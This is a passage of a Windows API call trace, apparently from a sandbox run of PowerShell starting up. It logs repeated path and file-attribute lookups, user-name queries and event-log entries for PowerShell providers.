lpFileInformation=0x29b92b4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xe662e5bd, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0x16ecdf0, ftLastAccessTime.dwHighDateTime=0x1d30633, ftLastWriteTime.dwLowDateTime=0x16ecdf0, ftLastWriteTime.dwHighDateTime=0x1d30633, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0053.259] GetLastError () returned 0xcb [0053.259] SetErrorMode (uMode=0x1) returned 0x1 [0053.259] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x14e588, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0053.259] GetLastError () returned 0xcb [0053.259] SetErrorMode (uMode=0x1) returned 0x1 [0053.259] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x29b9404 | out: lpFileInformation=0x29b9404*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xe662e5bd, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0x16ecdf0, ftLastAccessTime.dwHighDateTime=0x1d30633, ftLastWriteTime.dwLowDateTime=0x16ecdf0, ftLastWriteTime.dwHighDateTime=0x1d30633, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0053.259] GetLastError () returned 0xcb [0053.259] SetErrorMode (uMode=0x1) returned 0x1 [0053.260] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x14e5cc, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0053.260] GetLastError () returned 0xcb [0053.260] SetErrorMode (uMode=0x1) returned 0x1 [0053.260] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x29b95a4 | out: lpFileInformation=0x29b95a4*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xe662e5bd, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0x16ecdf0, ftLastAccessTime.dwHighDateTime=0x1d30633, ftLastWriteTime.dwLowDateTime=0x16ecdf0, ftLastWriteTime.dwHighDateTime=0x1d30633, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0053.260] GetLastError () returned 0xcb [0053.260] SetErrorMode (uMode=0x1) returned 0x1 [0053.260] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x358040, nSize=0x14eb54 | out: lpNameBuffer="F71GWAT\\BGC6u8Oy yXGxkR", nSize=0x14eb54) returned 0x1 [0053.260] GetLastError () returned 0xcb [0053.260] GetUserNameW (in: lpBuffer=0x3175c0, pcbBuffer=0x14eb5c | out: lpBuffer="BGC6u8Oy yXGxkR", pcbBuffer=0x14eb5c) returned 1 [0053.261] ReportEventW (hEventLog=0x4390004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x29bc2fc*="FileSystem", lpRawData=0x29bc1b8) returned 1 [0053.261] GetLastError () returned 0x0 [0053.262] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0053.262] GetLastError () returned 0xcb [0053.262] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e570, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.262] GetLastError () returned 0xcb [0053.262] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.262] GetLastError () returned 0xcb [0053.262] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.262] GetLastError () returned 0xcb [0053.263] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x358040, nSize=0x14eb54 | out: lpNameBuffer="F71GWAT\\BGC6u8Oy yXGxkR", nSize=0x14eb54) returned 0x1 [0053.263] GetLastError () returned 0xcb [0053.263] GetUserNameW (in: lpBuffer=0x3175c0, pcbBuffer=0x14eb5c | out: lpBuffer="BGC6u8Oy yXGxkR", pcbBuffer=0x14eb5c) returned 1 [0053.263] ReportEventW (hEventLog=0x4390004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x29c03bc*="Function", lpRawData=0x29c0278) returned 1 [0053.263] GetLastError () returned 0x0 [0053.266] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0053.266] GetLastError () returned 0xcb [0053.269] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e568, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.269] GetLastError () returned 0xcb [0053.269] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e518, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.269] GetLastError () returned 0xcb [0053.269] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e518, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.269] GetLastError () returned 0xcb [0053.269] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e518, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.269] GetLastError () returned 0xcb [0053.292] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x358040, nSize=0x14eb54 | out: lpNameBuffer="F71GWAT\\BGC6u8Oy yXGxkR", nSize=0x14eb54) returned 0x1 [0053.292] GetLastError () returned 0xcb [0053.292] GetUserNameW (in: lpBuffer=0x3175c0, pcbBuffer=0x14eb5c | out: lpBuffer="BGC6u8Oy yXGxkR", pcbBuffer=0x14eb5c) returned 1 [0053.293] ReportEventW (hEventLog=0x4390004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x29d9440*="Registry", lpRawData=0x29d92fc) returned 1 [0053.293] GetLastError () returned 0x0 [0053.293] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e554, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.293] GetLastError () returned 0x0 [0053.293] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e504, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.294] GetLastError () returned 0x0 [0053.294] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14e504, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0053.294] GetLastError () returned 0x0 [0053.294] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x358040, nSize=0x14eb54 | out: lpNameBuffer="F71GWAT\\BGC6u8Oy yXGxkR", nSize=0x14eb54) returned 0x1 [0053.294] GetLastError () returned 0x0 [0053.295] GetUserNameW (in: lpBuffer=0x3175c0, pcbBuffer=0x14eb5c | out: lpBuffer="BGC6u8Oy yXGxkR", pcbBuffer=0x14eb5c) returned 1 [0053.295] ReportEventW (hEventLog=0x4390004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x29dd1f8*="Variable", lpRawData=0x29dd0b4) returned 1 [0053.295] GetLastError () returned 0x0 [0053.296] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0053.296] GetLastError () returned 0xcb [0053.297] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0053.297] GetLastError () returned 0xcb [0053.298] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x14e554, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0053.298] GetLastError () returned 0xcb [0053.298] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x14e504, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0053.298] GetLastError () returned 0xcb [0053.298] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x14e504, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0053.298] GetLastError () returned 0xcb [0053.298] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x14e504, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76 [0053.298] GetLastError () returned 0xcb [0053.337] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x358040, nSize=0x14eb54 | out: lpNameBuffer="F71GWAT\\BGC6u8Oy yXGxkR", nSize=0x14eb54) returned 0x1 [0053.337] GetLastError () returned 0x3 [0053.337] GetUserNameW (in: lpBuffer=0x3175c0, pcbBuffer=0x14eb5c | out: lpBuffer="BGC6u8Oy yXGxkR", pcbBuffer=0x14eb5c) returned 1 [0053.338] ReportEventW (hEventLog=0x4390004, wType=0x4, wCategory=0x6, dwEventID=0x258, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x29eaf8c*="Certificate", lpRawData=0x29eae48) returned 1 [0053.338] GetLastError () returned 0x0 [0053.345] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0053.345] GetLastError () returned 0xcb [0053.347] GetLogicalDrives () returned 0x4 [0053.347] GetLastError () returned 0xcb [0053.347] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x14e6cc, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0053.347] GetLastError () returned 0xcb [0053.347] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0053.347] GetLastError () returned 0xcb [0053.348] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x3175c0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0053.348] GetLastError () returned 0xcb [0053.349] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0053.349] GetLastError () returned 0xcb [0053.349] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0053.349] GetLastError () returned 0xcb [0053.372] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0053.372] GetLastError () returned 0xcb [0053.373] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0053.373] GetLastError () returned 0xcb [0053.373] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14e514, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0053.373] GetLastError () returned 0xcb [0053.374] SetErrorMode (uMode=0x1) returned 0x1 [0053.374] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x29f1eac | out: lpFileInformation=0x29f1eac*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb15659b, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x4a39a190, ftLastAccessTime.dwHighDateTime=0x1d30633, ftLastWriteTime.dwLowDateTime=0x4a39a190, ftLastWriteTime.dwHighDateTime=0x1d30633, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1 [0053.374] GetLastError () returned 0xcb [0053.374] SetErrorMode (uMode=0x1) returned 0x1 [0053.374] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14e51c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0053.374] GetLastError () returned 0xcb [0053.374] SetErrorMode (uMode=0x1) returned 0x1 [0053.374] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x29f2040 | out: lpFileInformation=0x29f2040*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb15659b, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x4a39a190, ftLastAccessTime.dwHighDateTime=0x1d30633, ftLastWriteTime.dwLowDateTime=0x4a39a190, ftLastWriteTime.dwHighDateTime=0x1d30633, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1 [0053.374] GetLastError () returned 0xcb [0053.374] SetErrorMode (uMode=0x1) returned 0x1 [0053.374] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3175c0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0053.374] GetLastError () returned 0xcb [0053.375] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14e664, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0053.375] GetLastError () returned 0xcb [0053.375] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x14e5e0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0053.375] GetLastError () returned 0xcb [0053.375] SetErrorMode (uMode=0x1) returned 0x1 [0053.376] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x14ea60 | out: lpFileInformation=0x14ea60*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xe662e5bd, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0x16ecdf0, ftLastAccessTime.dwHighDateTime=0x1d30633, ftLastWriteTime.dwLowDateTime=0x16ecdf0, ftLastWriteTime.dwHighDateTime=0x1d30633, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0053.376] GetLastError () returned 0xcb [0053.376] SetErrorMode (uMode=0x1) returned 0x1 [0053.376] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x14e5e0, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0053.376] GetLastError () returned 0xcb [0053.376] SetErrorMode (uMode=0x1) returned 0x1 [0053.376] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0x14ea60 | out: lpFileInformation=0x14ea60*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xe662e5bd, ftCreationTime.dwHighDateTime=0x1ca0427, ftLastAccessTime.dwLowDateTime=0x16ecdf0, ftLastAccessTime.dwHighDateTime=0x1d30633, ftLastWriteTime.dwLowDateTime=0x16ecdf0, ftLastWriteTime.dwHighDateTime=0x1d30633, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1 [0053.376] GetLastError () returned 0xcb [0053.376] SetErrorMode (uMode=0x1) returned 0x1 [0053.376] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0x14e5f4, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0053.376] GetLastError () returned 0xcb [0053.376] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x14e590, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0053.376] GetLastError () returned 0xcb [0053.376] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x14e5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0053.376] GetLastError () returned 0xcb [0053.376] SetErrorMode (uMode=0x1) returned 0x1 [0053.376] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x14ea60 | out: lpFileInformation=0x14ea60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa191445, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xe0ad1920, ftLastAccessTime.dwHighDateTime=0x1d2f5d7, ftLastWriteTime.dwLowDateTime=0xe0ad1920, ftLastWriteTime.dwHighDateTime=0x1d2f5d7, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1 [0053.376] GetLastError () returned 0xcb [0053.376] SetErrorMode (uMode=0x1) returned 0x1 [0053.376] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x14e5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0053.376] GetLastError () returned 0xcb [0053.376] SetErrorMode (uMode=0x1) returned 0x1 [0053.376] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x14ea60 | out: lpFileInformation=0x14ea60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa191445, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xe0ad1920, ftLastAccessTime.dwHighDateTime=0x1d2f5d7, ftLastWriteTime.dwLowDateTime=0xe0ad1920, ftLastWriteTime.dwHighDateTime=0x1d2f5d7, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1 [0053.376] GetLastError () returned 0xcb [0053.376] SetErrorMode (uMode=0x1) returned 0x1 [0053.376] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x14e5f4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0053.376] GetLastError () returned 0xcb [0053.376] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x14e590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0053.376] GetLastError () returned 0xcb [0053.377] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14e5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0053.377] GetLastError () returned 0xcb [0053.377] SetErrorMode (uMode=0x1) returned 0x1 [0053.377] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x14ea60 | out: lpFileInformation=0x14ea60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb15659b, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x4a39a190, ftLastAccessTime.dwHighDateTime=0x1d30633, ftLastWriteTime.dwLowDateTime=0x4a39a190, ftLastWriteTime.dwHighDateTime=0x1d30633, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1 [0053.377] GetLastError () returned 0xcb [0053.377] SetErrorMode (uMode=0x1) returned 0x1 [0053.377] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14e5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0053.377] GetLastError () returned 0xcb [0053.377] SetErrorMode (uMode=0x1) returned 0x1 [0053.377] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x14ea60 | out: lpFileInformation=0x14ea60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb15659b, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x4a39a190, ftLastAccessTime.dwHighDateTime=0x1d30633, ftLastWriteTime.dwLowDateTime=0x4a39a190, ftLastWriteTime.dwHighDateTime=0x1d30633, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1 [0053.377] GetLastError () returned 0xcb [0053.377] SetErrorMode (uMode=0x1) returned 0x1 [0053.377] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14e5f4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0053.377] GetLastError () returned 0xcb [0053.377] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0x14e590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0053.377] GetLastError () returned 0xcb [0053.377] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x14e5ec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0053.377] GetLastError () returned 0xcb [0053.377] SetErrorMode (uMode=0x1) returned 0x1 [0053.377] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x14ea6c | out: lpFileInformation=0x14ea6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa191445, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xe0ad1920, ftLastAccessTime.dwHighDateTime=0x1d2f5d7, ftLastWriteTime.dwLowDateTime=0xe0ad1920, ftLastWriteTime.dwHighDateTime=0x1d2f5d7, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1 [0053.377] GetLastError () returned 0xcb [0053.377] SetErrorMode (uMode=0x1) returned 0x1 [0053.377] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x14e5ec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0053.377] GetLastError () returned 0xcb [0053.377] SetErrorMode (uMode=0x1) returned 0x1 [0053.377] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x14ea6c | out: lpFileInformation=0x14ea6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa191445, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xe0ad1920, ftLastAccessTime.dwHighDateTime=0x1d2f5d7, ftLastWriteTime.dwLowDateTime=0xe0ad1920, ftLastWriteTime.dwHighDateTime=0x1d2f5d7, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1 [0053.377] GetLastError () returned 0xcb [0053.377] SetErrorMode (uMode=0x1) returned 0x1 [0053.377] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x14e600, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0053.377] GetLastError () returned 0xcb [0053.377] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0x14e59c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0053.377] GetLastError () returned 0xcb [0053.378] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14e5ec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0053.378] GetLastError () returned 0xcb [0053.378] SetErrorMode (uMode=0x1) returned 0x1 [0053.378] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x14ea6c | out: lpFileInformation=0x14ea6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb15659b, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x4a39a190, ftLastAccessTime.dwHighDateTime=0x1d30633, ftLastWriteTime.dwLowDateTime=0x4a39a190, ftLastWriteTime.dwHighDateTime=0x1d30633, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1 [0053.378] GetLastError () returned 0xcb [0053.378] SetErrorMode (uMode=0x1) returned 0x1 [0053.378] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14e5ec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0053.378] GetLastError () returned 0xcb [0053.378] SetErrorMode (uMode=0x1) returned 0x1 [0053.378] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x14ea6c | out: lpFileInformation=0x14ea6c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfb15659b, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0x4a39a190, ftLastAccessTime.dwHighDateTime=0x1d30633, ftLastWriteTime.dwLowDateTime=0x4a39a190, ftLastWriteTime.dwHighDateTime=0x1d30633, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1 [0053.378] GetLastError () returned 0xcb [0053.378] SetErrorMode (uMode=0x1) returned 0x1 [0053.378] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x14e600, lpFilePart=0x0 | out: 